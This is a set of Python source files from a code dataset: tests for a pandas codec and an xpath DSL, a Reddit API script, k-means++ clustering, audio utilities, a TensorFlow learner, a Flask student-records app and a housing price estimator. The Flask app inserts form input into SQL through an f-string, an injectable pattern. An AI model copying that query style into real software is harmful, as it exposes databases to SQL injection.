datatype=\"BYTES\",\n shape=[1, 11],\n parameters=Parameters(_decoded_payload=[\"hello world\"]),\n ),\n ]\n ),\n pd.DataFrame({\"a\": [np.array([1, 2, 3])], \"b\": [\"hello world\"]}),\n ),\n (\n InferenceRequest(\n inputs=[\n RequestInput(\n name=\"a\",\n data=[1, 2, 3],\n datatype=\"FP32\",\n shape=[3, 1],\n parameters=Parameters(\n _decoded_payload=np.array([[1], [2], [3]])\n ),\n ),\n RequestInput(\n name=\"b\",\n data=b\"ABC\",\n datatype=\"BYTES\",\n shape=[3, 1],\n ),\n ]\n ),\n pd.DataFrame(\n {\n \"a\": [[1], [2], [3]],\n \"b\": [a for a in b\"ABC\"],\n }\n ),\n ),\n ],\n)\ndef test_decode(inference_request, expected):\n codec = PandasCodec()\n decoded = codec.decode(inference_request)\n\n pd.testing.assert_frame_equal(decoded, expected)\n","sub_path":"tests/codecs/test_pandas.py","file_name":"test_pandas.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"261370397","text":"#!/usr/bin/python3\n\nimport json\nimport requests\nfrom requests.exceptions import ConnectionError\n\n\ndef top_ten(subreddit):\n \"\"\" Function to determine number of subscribers of given subreddit\"\"\"\n url = \"https://www.reddit.com/r/{}/hot.json?limit=10\".format(subreddit)\n headers = {'User-Agent': 'My User Agent'}\n req = requests.get(url, headers=headers, allow_redirects=False)\n if (req.status_code == requests.codes.ok):\n r = req.json()\n data = r['data']['children']\n for i in range(len(data)):\n title = data[i]['data']['title']\n print(title)\n else:\n print(\"None\")\n","sub_path":"0x1B-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508685446","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/8/22 上午10:45\n# @Author : jyl\n# @File : kmeans_plus_plus.py\nimport numpy as np\nfrom utils import alias_sample\nimport collections\n\n\ndef kmeans_plus_plus(dataset, k):\n if not isinstance(dataset, np.ndarray):\n dataset = np.array(dataset)\n center_ids = choose_centers(dataset, k)\n centers = dataset[center_ids]\n classes_before = np.arange(len(dataset))\n while True:\n classes_after = do_cluster(dataset, centers)\n if (classes_before == classes_after).all():\n break\n\n classes_before = classes_after\n for c in range(k):\n data_c = dataset[np.argwhere(classes_after == c)]\n center_c = np.mean(data_c, axis=0)\n centers[c] = center_c\n\n return centers, classes_after\n\n\ndef choose_centers(dataset, k):\n center_ids = [np.random.choice(len(dataset), size=1)]\n dist_mat = np.empty(shape=[len(dataset), len(dataset)])\n for i in range(len(dataset)):\n for j in range(len(dataset)):\n if i == j:\n dist_mat[i, j] = 0.\n elif i < j:\n dist_mat[i, j] = np.mean(np.square(dataset[i] - dataset[j]))\n else:\n dist_mat[i, j] = dist_mat[j, i]\n while len(center_ids) < k:\n nodes_min_dist = np.min(dist_mat[:, center_ids], axis=1)\n probs = nodes_min_dist / np.sum(nodes_min_dist)\n center_ids.append(alias_sample(probs.reshape(-1), 1))\n center_ids = np.array(center_ids).reshape(-1)\n return center_ids\n\n\ndef do_cluster(dataset, centers):\n dist = []\n for center in centers:\n dist.append(np.mean(np.square(dataset - center), axis=1))\n dist = np.vstack(dist)\n classes = np.argmin(dist, axis=0)\n return classes\n\n\ndef show_result(class_list, raw_data, center_coordinate):\n colors = [\n '#FF0000', '#FFA500', '#FFFF00', '#00FF00', '#228B22',\n '#0000FF', '#FF1493', '#EE82EE', '#000000', '#FFA500',\n '#00FF00', '#006400', '#00FFFF', '#0000FF', '#FFFACD',\n ]\n\n # 画最终聚类效果图\n use_color = {}\n total_color = list(dict(collections.Counter(class_list)).keys())\n for index, i in enumerate(total_color):\n use_color[i] = index\n plt.figure(num=1, figsize=(16, 9))\n for index, point in enumerate(class_list):\n plt.scatter(x=raw_data[index, 0], y=raw_data[index, 1], c=colors[use_color[point]], s=50, marker='o', alpha=0.9)\n plt.scatter(x=center_coordinate[:, 0], y=center_coordinate[:, 1], c='b', s=200, marker='+', alpha=0.8)\n plt.title('K-means++')\n plt.savefig('./kmeans++_result.jpg')\n plt.show()\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n data_path = '/media/dk/MyFiles/Data/clustering/Aggregation.txt'\n data = np.loadtxt(data_path, delimiter='\t', usecols=[0, 1], dtype=np.float32)\n centers, classes = kmeans_plus_plus(data, 7)\n show_result(classes, data, centers)\n\n\n\n","sub_path":"VOC/utils/cluster/kmeans_plus_plus.py","file_name":"kmeans_plus_plus.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"296549039","text":"from tests.case import DSLTestCase\nfrom xpath.dsl import attr, descendant\nfrom xpath.renderer import to_xpath\n\n\nclass TestDescendant(DSLTestCase):\n __fixture__ = \"simple.html\"\n\n def test_finds_nodes_that_are_nested_below_the_current_node(self):\n xpath = to_xpath(descendant(\"p\"))\n results = self.find_all(xpath)\n self.assertEqual(results[0].text, \"Blah\")\n self.assertEqual(results[1].text, \"Bax\")\n\n def test_does_not_find_nodes_outside_the_context(self):\n foo_div = descendant(\"div\")[attr(\"id\").equals(\"foo\")]\n xpath = to_xpath(descendant(\"p\")[attr(\"id\").equals(foo_div.attr(\"title\"))])\n results = self.find_all(xpath)\n self.assertSequenceEqual(results, [])\n\n def test_finds_multiple_kinds_of_nodes(self):\n xpath = to_xpath(descendant(\"p\", \"ul\"))\n results = self.find_all(xpath)\n self.assertEqual(results[0].text, \"Blah\")\n self.assertEqual(results[3].text, \"A list\")\n\n def test_finds_all_nodes_when_no_arguments_given(self):\n xpath = to_xpath(descendant()[attr(\"id\").equals(\"foo\")].descendant())\n results = self.find_all(xpath)\n self.assertEqual(results[0].text, \"Blah\")\n self.assertEqual(results[4].text, \"A list\")\n","sub_path":"tests/dsl/test_descendant.py","file_name":"test_descendant.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"210234849","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions:\r\n-----------\r\n\r\n This submodule carries a set of useful functions of general purpouses when\r\n using PyTTa, like reading and writing wave files, seeing the audio IO\r\n devices available and some signal processing tools.\r\n\r\n Available functions:\r\n ---------------------\r\n\r\n >>> pytta.list_devices()\r\n >>> pytta.read_wav( fileName )\r\n >>> pytta.write_wav( fileName, signalObject )\r\n >>> pytta.save(fileName, obj1, ..., objN)\r\n >>> pytta.load(fileName)\r\n >>> pytta.merge( signalObj1, signalObj2, ..., signalObjN )\r\n >>> pytta.fft_convolve( signalObj1, signalObj2 )\r\n >>> pytta.find_delay( signalObj1, signalObj2 )\r\n >>> pytta.corr_coef( signalObj1, signalObj2 )\r\n >>> pytta.resample( signalObj, newSamplingRate )\r\n >>> pytta.peak_time(signalObj1, signalObj2, ..., signalObjN )\r\n\r\n\r\n For further information, check the function specific documentation.\r\n\"\"\"\r\n\r\n\r\nimport os\r\nimport time\r\nimport json\r\nfrom scipy.io import wavfile as wf\r\nimport scipy.io as sio\r\nimport numpy as np\r\nimport sounddevice as sd\r\nimport scipy.signal as ss\r\nimport scipy.fftpack as sfft\r\nimport zipfile as zf\r\nfrom .classes import SignalObj, ImpulsiveResponse, RecMeasure,\\\r\n PlayRecMeasure, FRFMeasure\r\nimport copy as cp\r\n\r\n\r\ndef list_devices():\r\n \"\"\"\r\n Shortcut to sounddevice.query_devices(). Made to exclude the need of\r\n importing Sounddevice directly just to find out which audio devices can be\r\n used.\r\n\r\n >>> pytta.list_devices()\r\n\r\n \"\"\"\r\n return sd.query_devices()\r\n\r\n\r\ndef read_wav(fileName):\r\n \"\"\"\r\n Reads a wave file into a SignalObj\r\n \"\"\"\r\n samplingRate, data = wf.read(fileName)\r\n if data.dtype == 'int16':\r\n data = data/(2**15)\r\n if data.dtype == 'int32':\r\n data = data/(2**31)\r\n signal = SignalObj(data, 'time', samplingRate=samplingRate)\r\n return signal\r\n\r\n\r\ndef write_wav(fileName, signalIn):\r\n \"\"\"\r\n Writes a SignalObj into a single wave file\r\n \"\"\"\r\n samplingRate = signalIn.samplingRate\r\n data = signalIn.timeSignal\r\n return wf.write(fileName, samplingRate, data)\r\n\r\n\r\n# Refactor for new SignalObj's channelsList\r\ndef merge(signal1, *signalObjects):\r\n \"\"\"\r\n Gather all of the input argument signalObjs into a single\r\n signalObj and place the respective timeSignal of each\r\n as a column of the new object\r\n \"\"\"\r\n j = 1\r\n comment = cp.deepcopy(signal1.comment)\r\n channels = cp.deepcopy(signal1.channels)\r\n timeSignal = cp.deepcopy(signal1.timeSignal)\r\n for inObj in signalObjects:\r\n if signal1.samplingRate != inObj.samplingRate:\r\n message = '\\\r\n \\n To merge signals they must have the same sampling rate!\\\r\n \\n SignalObj 1 and '+str(j+1)+' have different sampling rates.'\r\n raise AttributeError(message)\r\n if signal1.numSamples != inObj.numSamples:\r\n message = '\\\r\n \\n To merge signals they must have the same length!\\\r\n \\n SignalObj 1 and '+str(j+1)+' have different lengths.'\r\n raise AttributeError(message)\r\n comment = comment + ' / ' + inObj.comment\r\n for ch in inObj.channels:\r\n channels.append(ch)\r\n timeSignal = np.hstack((timeSignal, inObj.timeSignal))\r\n j += 1\r\n newSignal = SignalObj(timeSignal, domain='time',\r\n samplingRate=signal1.samplingRate, comment=comment)\r\n channels.conform_to()\r\n newSignal.channels = channels\r\n return newSignal\r\n\r\n\r\n# def split(signal):\r\n# return 0\r\n\r\n\r\ndef fft_convolve(signal1, signal2):\r\n \"\"\"\r\n Uses scipy.signal.fftconvolve() to convolve two time domain signals.\r\n\r\n >>> convolution = pytta.fft_convolve(signal1,signal2)\r\n\r\n \"\"\"\r\n# Fs = signal1.Fs\r\n conv = ss.fftconvolve(signal1.timeSignal, signal2.timeSignal)\r\n signal = SignalObj(conv, 'time', signal1.samplingRate)\r\n return signal\r\n\r\n\r\ndef find_delay(signal1, signal2):\r\n \"\"\"\r\n Cross Correlation alternative, more efficient fft based method to calculate\r\n time shift between two signals.\r\n\r\n >>> shift = pytta.find_delay(signal1,signal2)\r\n\r\n \"\"\"\r\n if signal1.N != signal2.N:\r\n return print('Signal1 and Signal2 must have the same length')\r\n else:\r\n freqSignal1 = signal1.freqSignal\r\n freqSignal2 = sfft.fft(np.flipud(signal2.timeSignal))\r\n convoluted = np.real(sfft.ifft(freqSignal1 * freqSignal2))\r\n convShifted = sfft.fftshift(convoluted)\r\n zeroIndex = int(signal1.numSamples / 2) - 1\r\n shift = zeroIndex - np.argmax(convShifted)\r\n return shift\r\n\r\n\r\ndef corr_coef(signal1, signal2):\r\n \"\"\"\r\n Finds the correlation coeficient between two SignalObjs using\r\n the numpy.corrcoef() function.\r\n \"\"\"\r\n coef = np.corrcoef(signal1.timeSignal, signal2.timeSignal)\r\n return coef[0, 1]\r\n\r\n\r\ndef resample(signal, newSamplingRate):\r\n \"\"\"\r\n Resample the timeSignal of the input SignalObj to the\r\n given sample rate using the scipy.signal.resample() function\r\n \"\"\"\r\n newSignalSize = np.int(signal.timeLength*newSamplingRate)\r\n resampled = ss.resample(signal.timeSignal[:], newSignalSize)\r\n newSignal = SignalObj(resampled, \"time\", newSamplingRate)\r\n return newSignal\r\n\r\n\r\ndef peak_time(signal):\r\n \"\"\"\r\n Return the time at signal's amplitude peak.\r\n \"\"\"\r\n if not isinstance(signal, SignalObj):\r\n raise TypeError('Signal must be an SignalObj.')\r\n peaks_time = []\r\n for chindex in range(signal.num_channels()):\r\n maxamp = max(np.abs(signal.timeSignal[:, chindex]))\r\n maxindex = np.where(signal.timeSignal[:, chindex] == np.abs(maxamp))[0]\r\n maxtime = signal.timeVector[maxindex][0]\r\n peaks_time.append(maxtime)\r\n if signal.num_channels() > 1:\r\n return peaks_time\r\n else:\r\n return peaks_time[0]\r\n\r\n\r\ndef save(fileName: str = time.ctime(time.time()), *PyTTaObjs):\r\n \"\"\"\r\n Saves any number of PyTTaObj subclasses' objects to fileName.pytta file.\r\n\r\n Just calls .save() method of each class and packs them all into a major\r\n .pytta file along with a Meta.json file containing the fileName of each\r\n saved object.\r\n\r\n The .pytta extension must not be appended to the fileName\r\n \"\"\"\r\n meta = {}\r\n with zf.ZipFile(fileName + '.pytta', 'w') as zdir:\r\n for idx, obj in enumerate(PyTTaObjs):\r\n sobj = obj.save('obj' + str(idx))\r\n meta['obj' + str(idx)] = sobj\r\n zdir.write(sobj)\r\n os.remove(sobj)\r\n with open('Meta.json', 'w') as f:\r\n json.dump(meta, f, indent=4)\r\n zdir.write('Meta.json')\r\n os.remove('Meta.json')\r\n return fileName + '.pytta'\r\n\r\n\r\ndef load(fileName: str):\r\n \"\"\"\r\n Loads .pytta files and parses it's types to the correct objects.\r\n \"\"\"\r\n if fileName.split('.')[-1] == 'pytta':\r\n with zf.ZipFile(fileName, 'r') as zdir:\r\n objects = zdir.namelist()\r\n for obj in objects:\r\n if obj.split('.')[-1] == 'json':\r\n meta = obj\r\n zdir.extractall()\r\n output = __parse_load(meta)\r\n else:\r\n raise ValueError(\"Load function only works with *.pytta files\")\r\n return output\r\n\r\n\r\ndef __parse_load(className):\r\n name = className.split('.')[0]\r\n openJson = json.load(open(className, 'r'))\r\n if name == 'SignalObj':\r\n openMat = sio.loadmat(openJson['timeSignalAddress'])\r\n out = SignalObj(openMat['timeSignal'], domain=openJson['lengthDomain'],\r\n samplingRate=openJson['samplingRate'],\r\n freqMin=openJson['freqLims'][0],\r\n freqMax=openJson['freqLims'][1],\r\n comment=openJson['comment'])\r\n out.channels = __parse_channels(openJson['channels'],\r\n out.channels)\r\n os.remove(openJson['timeSignalAddress'])\r\n\r\n elif name == 'ImpulsiveResponse':\r\n excit = load(openJson['SignalAddress']['excitation'])\r\n record = load(openJson['SignalAddress']['recording'])\r\n out = ImpulsiveResponse(excit, record, openJson['coordinates'],\r\n **openJson['methodInfo'])\r\n os.remove(openJson['SignalAddress']['excitation'])\r\n os.remove(openJson['SignalAddress']['recording'])\r\n\r\n elif name == 'RecMeasure':\r\n inch = list(np.arange(len(openJson['inChannel'])))\r\n out = RecMeasure(device=openJson['device'],\r\n inChannel=inch,\r\n lengthDomain='samples',\r\n fftDegree=openJson['fftDegree'])\r\n out.inChannel = __parse_channels(openJson['inChannel'],\r\n out.inChannel)\r\n\r\n elif name == 'PlayRecMeasure':\r\n inch = list(1 + np.arange(len(openJson['inChannel'])))\r\n excit = load(openJson['excitationAddress'])\r\n out = PlayRecMeasure(excitation=excit, device=openJson['device'],\r\n inChannel=inch)\r\n out.inChannel = __parse_channels(openJson['inChannel'],\r\n out.inChannel)\r\n os.remove(openJson['excitationAddress'])\r\n\r\n elif name == 'FRFMeasure':\r\n inch = list(1 + np.arange(len(openJson['inChannel'])))\r\n excit = load(openJson['excitationAddress'])\r\n out = FRFMeasure(excitation=excit, device=openJson['device'],\r\n inChannel=inch)\r\n out.inChannel = __parse_channels(openJson['inChannel'],\r\n out.inChannel)\r\n os.remove(openJson['excitationAddress'])\r\n\r\n elif name == 'Meta':\r\n out = []\r\n for key, val in openJson.items():\r\n out.append(load(val))\r\n os.remove(val)\r\n os.remove(className)\r\n return out\r\n\r\n\r\ndef __parse_channels(chDict, chList):\r\n for key in chDict.keys():\r\n ch = int(key)-1\r\n chList[ch].num = ch+1\r\n chList[ch].unit = chDict[key]['unit']\r\n chList[ch].name = chDict[key]['name']\r\n chList[ch].CF = chDict[key]['calib'][0]\r\n chList[ch].calibCheck\\\r\n = chDict[key]['calib'][1]\r\n return chList\r\n","sub_path":"pytta/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":10301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"387950361","text":"import tensorflow as tf\nimport Losses\n\nclass Learner(object):\n \"\"\"\n A base learner for tensorflow.\n - optimiser\n - learning rate\n - batch size\n\n \"\"\"\n num = 0\n def __init__(self,func,loss_fn,batch_size = 50, dropout = False, keep_prob = 1.0,\n learning_rate = 0.005, decay = 1.0, momentum = 0.0, opt = tf.train.MomentumOptimizer):\n \n self.num = str(Learner.num)\n Learner.num += 1\n \n self.loss_fn = loss_fn\n self.batch_size = batch_size\n self.dropout = dropout\n self.keep_prob = keep_prob\n self.learning_rate = learning_rate\n self.decay = decay\n self.momentum = momentum\n self.opt = opt(learning_rate,momentum=momentum)\n \n self.func = func\n \n \n def summarise_grads(self,cost):\n grads_and_vars = opt.compute_gradients(cost,tf.trainable_variables()) #no, cant use this. need a collection? or something else??\n for grad,var in range(grads_and_vars):\n tf.histogram_summary('Grad'+var.name,grad)\n self.var_list = None\n \n def __str__(self):\n return 'Learner {}: Loss: {} \\nNet: {}'.format(self.num,self.loss_fn,self.func)\n \n \n##################################################################################################\n##################################################################################################\n##################################################################################################\nimport Losses\n\nclass Discrim(Learner):\n \"\"\"\n A discriminative network has;\n - some learner.\n - a loss that is the error (cross entropy) between their output and the data labels.\n \"\"\"\n def __init__(self,func):#so this is just a partial application by defining a loss function\n super().__init__(func,Losses.CrossEntropy)\n \n def __call__(self,inputs,onehot_labels):\n with tf.name_scope('Network'):\n self.outputs = self.func(inputs)\n with tf.name_scope('Optimise_CE'):\n self.accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(onehot_labels,1), \n tf.argmax(self.outputs,1)), tf.float32))\n self.loss = self.loss_fn(self.outputs,onehot_labels)\n return self.opt.minimize(self.loss)\n \nif __name__ =='__main__':\n ## i should turn these into doc tests??!?\n import numpy as np\n from LayerClass import FC\n \n #Define all the variables and placeholders\n inputs = tf.placeholder(tf.float32,shape=[None,784])\n labels = tf.placeholder(tf.int64,shape=(None,1))\n onehot_labels = tf.squeeze(tf.one_hot(labels,10,1.0,0.0))\n \n NN = Discrim(FC([784,10],tf.nn.relu))\n print(NN)\n train_step = NN(inputs,onehot_labels)\n \n #run\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for i in range(10):\n feed = {inputs:np.random.random((50,784)),labels:np.random.randint(0,10,50).reshape((50,1))}\n sess.run(train_step,feed_dict = feed)\n y= sess.run(NN.accuracy,feed_dict = feed)\n print('Discrim test : {}'.format(np.float32 == type(y)))\n \n ","sub_path":"build/lib/Core/LearnerClass.py","file_name":"LearnerClass.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"562214541","text":"import sqlite3\nfrom flask import Flask, render_template, request, jsonify\n\napp = Flask(__name__)\n\n\ndef init_sqlite_db():\n connection = sqlite3.connect(\"database.db\")\n print(\"database connection successful\")\n\n connection.execute(\"CREATE TABLE IF NOT EXISTS students(name TEXT, address TEXT, city TEXT, pin TEXT)\")\n print(\"tables created successfully\")\n\n connection.close()\n\n\ninit_sqlite_db()\n\n\n@app.route(\"/\")\n@app.route('/enter-new/')\ndef enter_new_student():\n return render_template(\"student.html\")\n\n\n@app.route('/add-new-record/', methods=['POST'])\ndef add_new_record():\n if request.method == \"POST\":\n try:\n name = request.form['name']\n address = request.form['address']\n city = request.form['city']\n pin = request.form['pin']\n\n with sqlite3.connect('database.db') as connection:\n cursor = connection.cursor()\n cursor.execute(f\"INSERT INTO students (name, address, city, pin) VALUES ('{name}', '{address}', '{city}', '{pin}')\")\n connection.commit()\n msg = \"Record successfully added.\"\n \n except Exception as e:\n connection.rollback()\n msg = f\"Error occurred in insert operation: {e}\"\n finally:\n connection.close()\n return render_template('result.html', msg=msg)\n\n\n@app.route('/show-students-data')\ndef show_data():\n\n with sqlite3.connect('database.db') as connection:\n cur = connection.cursor()\n cur.execute(\"SELECT * FROM students\")\n\n results = cur.fetchall()\n\n return jsonify(results)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440446160","text":"# -*- coding: utf-8 -*-\n\nimport urllib.parse\n\nfrom collections import defaultdict\nfrom html.parser import HTMLParser as BaseHTMLParser\n\n\ndef parse_link(link):\n return urllib.parse.urlparse(link)\n\n\ndef is_local_link(parsed_link):\n return (parsed_link.scheme == '' and\n parsed_link.netloc == '' and\n parsed_link.path != '')\n\n\nclass HTMLParser(BaseHTMLParser):\n link_attrs = ('src', 'href')\n skip_content_for_tags = ('code', )\n\n def __init__(self, *, convert_charrefs=True):\n super().__init__(convert_charrefs=convert_charrefs)\n self.reset()\n\n def reset(self):\n self.links_pos = defaultdict(list)\n self.skipping_content = False\n super().reset()\n\n def handle_starttag(self, tag, attrs):\n\n if self.skipping_content:\n return\n\n for name, value in attrs:\n if name in self.link_attrs:\n pos = self.getpos()\n self.links_pos[value].append(pos)\n\n if tag in self.skip_content_for_tags:\n self.skipping_content = True\n\n def handle_endtag(self, tag):\n if tag in self.skip_content_for_tags:\n self.skipping_content = False\n\n def get_links(self, html):\n self.reset()\n self.feed(html)\n return self.links_pos.copy()\n","sub_path":"venv/Lib/site-packages/wt/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"511313184","text":"import json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nDATA=None\nLABELS = [\"RANDOM\",\n\"BACK TO FRONT\",\n\"FRONT TO BACK\",\n\"BACK TO FRONT GROUP 4\",\n\"FRONT TO BACK GROUP 4\",\n\"WINDOW MIDDLE ISLE\",\n\"STEFFEN PERFECT\",\n\"STEFFEN MODIFIED\"]\nwith open('distribution_chart_data.txt') as json_file:\n DATA = json.load(json_file)\n\nfor data,label in zip(DATA,LABELS):\n plt.hist(data,alpha=0.5,label=label,density=True)\nplt.legend(prop={'size': 7},loc='upper center', bbox_to_anchor=(0.5, -0.05),\n fancybox=True, shadow=True, ncol=4)\nplt.savefig(\"ALL.png\")\n\nplt.clf()","sub_path":"Artificial Life with Cognitive Science/Plane-Boarding-Simulation/distribution_chart_creator.py","file_name":"distribution_chart_creator.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"863206","text":"import argparse\nimport datetime\nimport sys\n\ndef gen_file(blog_type, file_name, page_text):\n file_title = '_posts/%s/%s' % (blog_type, file_name)\n with open(file_title, 'w') as f:\n f.write(page_text)\n\ndef gen_page_text(title, summary, blog_type, file_name, date):\n page_text = '''---\ntitle: %s\nsummary: %s\ncover-image: hipster.jpg\nblog: %s\nfile-name: %s\ndate: %s 08:00:00\n---\n''' % (title, summary, blog_type, file_name, date)\n page_text += '''\n{% comment %}\nImage\npic pic-small pic-large\n\n\n;>pic;>Data Science and Machine Learning;>https://i.imgur.com/MctcYW5.png;>\n\nLink\n\n\n,>EECS 126: Probability,>https://inst.eecs.berkeley.edu/~ee126/fa18/,>\n\n{% highlight html %}\n\n{% endhighlight %}\n{% endcomment %}\n'''\n return page_text\n\nparser = argparse.ArgumentParser(description='Create a post')\nparser.add_argument('blog type',\n help='blog type can be: academics, cool, general, notes, or personal')\nparser.add_argument('blog title',\n help='title of blog post')\n\nargs = vars(parser.parse_args())\nblog_type = args['blog type']\ntitle = args['blog title']\nif blog_type not in {\"academics\", \"cool\", \"general\", \"notes\", \"personal\"}:\n print(\"invalid blog type\")\n sys.exit()\n\ndate = str(datetime.date.today())\nfile_name = \"%s-%s.md\" % (date, title.replace(\" \", \"-\"))\npage_text = gen_page_text(title, title, blog_type, file_name, date)\ngen_file(blog_type, file_name, page_text)\n","sub_path":"store/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"445788620","text":"from bge import logic, types, events\nfrom mathutils import Vector\n\nimport bge\nimport mathutils\nimport re\n\ndef main():\n \n cont = bge.logic.getCurrentController()\n self = cont.owner\t \n width = bge.render.getWindowWidth()\n height = bge.render.getWindowHeight()\n mouse = cont.sensors[\"Mouse\"]\n pos = mouse.position\n xPos = int(width/2) - pos[0]\n yPos = int(height/2) - pos[1]\n rotation = yPos*0.0006\n\n if pos != [int(width/2), int(height/2)]:\n self.applyRotation((rotation,0,0),True)\n bge.render.setMousePosition(int(width/2), int(height/2)) \n\nmain()\n","sub_path":"verticle.py","file_name":"verticle.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"295963135","text":"import argparse\nimport pickle\nimport os\nimport nltk\nimport spacy\n\nfrom vocab import Vocabulary\nfrom pycocotools.coco import COCO\n\nimport data\n\ndef main():\n print('extract attributes from captions...')\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_path', default='./data',\n help='path to datasets')\n parser.add_argument('--data_name', default='coco',\n help='{coco,f8k,f30k,10crop}_precomp|coco|f8k|f30k')\n parser.add_argument('--vocab_path', default='./data/vocab',\n help='Path to saved vocabulary pickle files.')\n parser.add_argument('--crop_size', default=224, type=int,\n help='Size of an image crop as the CNN input.')\n parser.add_argument('--workers', default=4, type=int,\n help='Number of data loader workers.')\n parser.add_argument('--batch_size', default=128, type=int,\n help='Size of a training mini-batch.')\n parser.add_argument('--use_restval', action='store_true',\n help='Use the restval data for training on MSCOCO.')\n opt = parser.parse_args()\n print(opt)\n\n # Load Vocabulary Wrapper\n vocab = pickle.load(open(os.path.join(\n opt.vocab_path, '%s_vocab.pkl' % opt.data_name), 'rb'))\n opt.vocab_size = len(vocab)\n\n paths = data.get_paths(opt.data_path+'/'+opt.data_name)[0]\n coco = COCO(paths['train']['cap'])\n\n nlp = spacy.load('en')\n attributes2nouns = {}\n attributes2count = {}\n for i, key in enumerate(coco.anns.keys()):\n caption = coco.anns[key]['caption']\n doc = nlp(str(caption).lower().decode('utf-8'))\n for token in doc:\n if token.dep_ == 'amod':\n if not attributes2count.has_key(token.text):\n attributes2count[token.text] = 0\n if not attributes2nouns.has_key(token.text):\n attributes2nouns[token.text] = set()\n\n attributes2count[token.text] = attributes2count[token.text] + 1\n attributes2nouns[token.text].add(token.head.text)\n\n if i % 100 == 0:\n print ('{}/{} captions processed. {} attributes'\n .format(i, len(coco.anns.keys()), len(attributes2count)))\n\n k = 1000\n # extract top k attributes\n attributes = sorted(attributes2count, key=attributes2count.get, reverse=True)[0:k]\n # filter attributes2nouns\n attributes2nouns = {att: attributes2nouns[att] for att in attributes}\n\n writepath = opt.data_path+'/'+opt.data_name+'_attributes.pkl'\n pickle.dump({\n \"attributes\": attributes,\n \"attributes2nouns\": attributes2nouns},\n open(writepath, \"wb\")\n )\n print('extraction finished and written to {}'.format(writepath))\n\nif __name__ == '__main__':\n main()","sub_path":"extract_attributes.py","file_name":"extract_attributes.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"520960102","text":"from sklearn.datasets import load_boston\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\n\nimport pandas as pd\nimport numpy as np\n\n# Gather Data\nboston_dataset = load_boston()\ndata= pd.DataFrame(data=boston_dataset.data, columns = boston_dataset.feature_names)\nfeatures = data.drop(['INDUS', 'AGE'], axis = 1)\n\nlog_prices = np.log(boston_dataset.target)\ntarget = pd.DataFrame(log_prices, columns =['PRICE'])\n\nCRIME_IDX = 0\nZN_IDX = 1\nCHAS_IDX = 2\nRM_IDX = 4\nPTRATIO_IDX = 8\n\nZILLOW_MEDIAN_PRICE = 583.3\nSCALE_FACTOR = ZILLOW_MEDIAN_PRICE / np.median(boston_dataset.target) \n\nproperty_stats =features.mean().values.reshape(1,11)\n\nregr = LinearRegression().fit(features, target)\nfitted_vals = regr.predict(features)\n\n# Calculating MSE \nMSE = mean_squared_error(target, fitted_vals)\nRMSE = np.sqrt(MSE)\n\ndef get_log_estimate(nr_rooms,\n students_per_classroom,\n next_to_river=False,\n high_confidence=True):\n #configure property\n property_stats[0][RM_IDX] = nr_rooms\n property_stats[0][PTRATIO_IDX] = students_per_classroom\n \n if next_to_river:\n property_stats[0][CHAS_IDX] = 1\n else:\n property_stats[0][CHAS_IDX] = 0\n \n #make prediction\n #log_estimate = round(regr.predict(property_stats)[0][0],2)\n log_estimate = regr.predict(property_stats)[0][0]\n \n # calc range\n if high_confidence:\n upper_bound = log_estimate + 2*RMSE\n lower_bound = log_estimate - 2*RMSE\n interval = 95\n else:\n upper_bound = log_estimate + RMSE\n lower_bound = log_estimate - RMSE\n interval = 68\n \n return log_estimate, upper_bound, lower_bound, interval\n\n\ndef get_dollar_estimate(rm, ptratio, chas=False, large_range=True):\n \"\"\" \n Estimate price of a property in Boston \n \n Arguents: \n rm = # of rooms\n ptratio = number of students per teacher in school nearest home\n chas = is near or next to charles river (True or False)\n large_range = 'True' for 95% prediction interval, 'False' for 68% prediction interval\n \"\"\"\n \n \n if rm < 1 or rm > 20 or ptratio < 1 or ptratio > 196 :\n print('Unrealistic paramaters. Try again.')\n return\n \n log_est, upper, lower, conf = get_log_estimate(rm, \n students_per_classroom = ptratio, next_to_river = chas, \n high_confidence = large_range)\n\n #convert to todays dollars \n dollar_est =np.e**log_est * 1000 * SCALE_FACTOR\n dollar_hi =np.e**upper * 1000 * SCALE_FACTOR\n dollar_low =np.e**lower * 1000 * SCALE_FACTOR\n\n #round dollars to nearest 2 decimals\n rounded_est = round(dollar_est,-3)\n rounded_hi = round(dollar_hi,-3)\n rounded_low = round(dollar_low,-3)\n\n print(f'The estimated property value is ${rounded_est}.')\n 